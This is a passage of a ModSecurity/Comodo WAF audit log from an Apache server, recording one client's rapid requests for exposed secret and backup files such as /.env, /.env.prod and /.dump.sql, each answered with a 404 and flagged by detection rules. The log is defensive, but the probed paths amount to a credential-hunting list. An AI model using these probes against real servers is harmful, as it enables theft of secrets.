".db_backup.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".db_backup.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.db_backup.sql"] [unique_id "aFCryAJ4p5Cdblnjra53ggAAAAI"] Stopwatch: 1750117320656100 3184 (- - -) Stopwatch2: 1750117320656100 3184; combined=1925, p1=387, p2=1439, p3=19, p4=25, p5=55, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea77bc4e-Z-- --5cdf8b21-A-- [17/Jun/2025:05:12:01.323326 +0530] aFCryQGFf516NUzzD0B2_wAAAAg 185.177.72.204 59892 127.0.0.1 7080 --5cdf8b21-B-- GET /.dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5cdf8b21-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cdf8b21-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".dump.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".dump.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.dump.sql"] [unique_id "aFCryQGFf516NUzzD0B2_wAAAAg"] Stopwatch: 1750117321320378 2990 (- - -) Stopwatch2: 1750117321320378 2990; combined=1752, p1=340, p2=1313, p3=19, p4=24, p5=56, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5cdf8b21-Z-- --60a5fd37-A-- [17/Jun/2025:05:12:01.655493 +0530] aFCryQGFf516NUzzD0B3AAAAAAg 185.177.72.204 59910 127.0.0.1 7080 --60a5fd37-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --60a5fd37-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --60a5fd37-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aFCryQGFf516NUzzD0B3AAAAAAg"] Stopwatch: 1750117321651656 3897 (- - -) Stopwatch2: 1750117321651656 3897; combined=2416, p1=481, p2=1807, p3=26, p4=32, p5=69, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60a5fd37-Z-- --65f2b005-A-- [17/Jun/2025:05:12:01.766346 +0530] aFCryVCTF37l_jAzt4oSmgAAAAU 185.177.72.204 59914 127.0.0.1 7080 --65f2b005-B-- GET /.env.backup HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --65f2b005-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --65f2b005-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.backup"] [unique_id "aFCryVCTF37l_jAzt4oSmgAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.env.backup"] [unique_id "aFCryVCTF37l_jAzt4oSmgAAAAU"] Stopwatch: 1750117321762917 3491 (- - -) Stopwatch2: 1750117321762917 3491; combined=2191, p1=487, p2=1572, p3=20, p4=28, p5=84, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65f2b005-Z-- --77b3c45c-A-- [17/Jun/2025:05:12:01.877666 +0530] aFCryQrsPejRtmHkrKLgNAAAAAE 185.177.72.204 59924 127.0.0.1 7080 --77b3c45c-B-- GET /.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --77b3c45c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b3c45c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.bak"] [unique_id "aFCryQrsPejRtmHkrKLgNAAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.env.bak"] [unique_id "aFCryQrsPejRtmHkrKLgNAAAAAE"] Stopwatch: 1750117321873642 4084 (- - -) Stopwatch2: 1750117321873642 4084; combined=2576, p1=516, p2=1900, p3=28, p4=35, p5=96, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77b3c45c-Z-- --24c9c81d-A-- [17/Jun/2025:05:12:01.989173 +0530] aFCryVJfblPUQiSn5r2RSAAAAAA 185.177.72.204 59934 127.0.0.1 7080 --24c9c81d-B-- GET /.env.dev HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --24c9c81d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c9c81d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.dev"] [unique_id "aFCryVJfblPUQiSn5r2RSAAAAAA"] Stopwatch: 1750117321984924 4312 (- - -) Stopwatch2: 1750117321984924 4312; combined=2707, p1=505, p2=2058, p3=30, p4=36, p5=77, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --24c9c81d-Z-- --f868f824-A-- [17/Jun/2025:05:12:02.099919 +0530] aFCrylCTF37l_jAzt4oSmwAAAAU 185.177.72.204 59940 127.0.0.1 7080 --f868f824-B-- GET /.env.dev.json HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f868f824-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f868f824-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.dev.json"] [unique_id "aFCrylCTF37l_jAzt4oSmwAAAAU"] Stopwatch: 1750117322096310 3667 (- - -) Stopwatch2: 1750117322096310 3667; combined=2328, p1=446, p2=1757, p3=25, p4=31, p5=69, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f868f824-Z-- --7c78b232-A-- [17/Jun/2025:05:12:02.211251 +0530] aFCrygrsPejRtmHkrKLgNQAAAAE 185.177.72.204 59946 127.0.0.1 7080 --7c78b232-B-- GET /.env.example HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7c78b232-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c78b232-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.example"] [unique_id "aFCrygrsPejRtmHkrKLgNQAAAAE"] Stopwatch: 1750117322207342 3954 (- - -) Stopwatch2: 1750117322207342 3954; combined=2396, p1=479, p2=1793, p3=27, p4=36, p5=61, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7c78b232-Z-- --e7f38e53-A-- [17/Jun/2025:05:12:02.322446 +0530] aFCrygGFf516NUzzD0B3AgAAAAg 185.177.72.204 59948 127.0.0.1 7080 --e7f38e53-B-- GET /.env.js HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e7f38e53-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7f38e53-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.js"] [unique_id "aFCrygGFf516NUzzD0B3AgAAAAg"] Stopwatch: 1750117322318654 3862 (- - -) Stopwatch2: 1750117322318654 3862; combined=2492, p1=416, p2=1927, p3=29, p4=37, p5=83, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e7f38e53-Z-- --2bb6856d-A-- [17/Jun/2025:05:12:02.432968 +0530] aFCrylCTF37l_jAzt4oSnAAAAAU 185.177.72.204 59952 127.0.0.1 7080 --2bb6856d-B-- GET /.env.json HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2bb6856d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bb6856d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.json"] [unique_id "aFCrylCTF37l_jAzt4oSnAAAAAU"] Stopwatch: 1750117322429736 3282 (- - -) Stopwatch2: 1750117322429736 3282; combined=2045, p1=390, p2=1550, p3=21, p4=27, p5=57, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2bb6856d-Z-- --342c0561-A-- [17/Jun/2025:05:12:02.542827 +0530] aFCrygJ4p5Cdblnjra53iAAAAAI 185.177.72.204 59962 127.0.0.1 7080 --342c0561-B-- GET /.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --342c0561-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --342c0561-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.local"] [unique_id "aFCrygJ4p5Cdblnjra53iAAAAAI"] Stopwatch: 1750117322540125 2745 (- - -) Stopwatch2: 1750117322540125 2745; combined=1679, p1=524, p2=1082, p3=13, p4=17, p5=43, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --342c0561-Z-- --ff6b293c-A-- [17/Jun/2025:05:12:02.653841 +0530] aFCrytyZ4SMykfn97vy3IwAAAAs 185.177.72.204 59978 127.0.0.1 7080 --ff6b293c-B-- GET /.env.local.json HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ff6b293c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff6b293c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.local.json"] [unique_id "aFCrytyZ4SMykfn97vy3IwAAAAs"] Stopwatch: 1750117322649962 3924 (- - -) Stopwatch2: 1750117322649962 3924; combined=2319, p1=530, p2=1691, p3=21, p4=27, p5=50, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ff6b293c-Z-- --a9a80603-A-- [17/Jun/2025:05:12:02.764924 +0530] aFCrylCTF37l_jAzt4oSnQAAAAU 185.177.72.204 59986 127.0.0.1 7080 --a9a80603-B-- GET /.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a9a80603-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9a80603-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.old"] [unique_id "aFCrylCTF37l_jAzt4oSnQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.env.old"] [unique_id "aFCrylCTF37l_jAzt4oSnQAAAAU"] Stopwatch: 1750117322761220 3758 (- - -) Stopwatch2: 1750117322761220 3758; combined=2285, p1=493, p2=1648, p3=24, p4=30, p5=90, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9a80603-Z-- --04a77b67-A-- [17/Jun/2025:05:12:02.875138 +0530] aFCrygJ4p5Cdblnjra53iQAAAAI 185.177.72.204 59994 127.0.0.1 7080 --04a77b67-B-- GET /.env.prod HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --04a77b67-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --04a77b67-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.prod"] [unique_id "aFCrygJ4p5Cdblnjra53iQAAAAI"] Stopwatch: 1750117322872111 3081 (- - -) Stopwatch2: 1750117322872111 3081; combined=1858, p1=375, p2=1390, p3=22, p4=24, p5=47, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04a77b67-Z-- --04932307-A-- [17/Jun/2025:05:12:02.985831 +0530] aFCrygGFf516NUzzD0B3BAAAAAg 185.177.72.204 60000 127.0.0.1 7080 --04932307-B-- GET /.env.prod.json HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --04932307-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --04932307-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.prod.json"] [unique_id "aFCrygGFf516NUzzD0B3BAAAAAg"] Stopwatch: 1750117322982776 3098 (- - -) Stopwatch2: 1750117322982776 3098; combined=1830, p1=454, p2=1281, p3=18, p4=24, p5=53, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04932307-Z-- --9700de36-A-- [17/Jun/2025:05:12:03.095343 +0530] aFCry1CTF37l_jAzt4oSngAAAAU 185.177.72.204 60010 127.0.0.1 7080 --9700de36-B-- GET /.env.production HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9700de36-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9700de36-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.production"] [unique_id "aFCry1CTF37l_jAzt4oSngAAAAU"] Stopwatch: 1750117323093085 2300 (- - -) Stopwatch2: 1750117323093085 2300; combined=1465, p1=303, p2=1080, p3=14, p4=23, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9700de36-Z-- --bd305303-A-- [17/Jun/2025:05:12:03.212265 +0530] aFCrywJ4p5Cdblnjra53igAAAAI 185.177.72.204 60026 127.0.0.1 7080 --bd305303-B-- GET /.env.production.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bd305303-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd305303-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.production.local"] [unique_id "aFCrywJ4p5Cdblnjra53igAAAAI"] Stopwatch: 1750117323209107 3209 (- - -) Stopwatch2: 1750117323209107 3209; combined=1970, p1=392, p2=1476, p3=20, p4=27, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bd305303-Z-- --dccddb21-A-- [17/Jun/2025:05:12:03.322772 +0530] 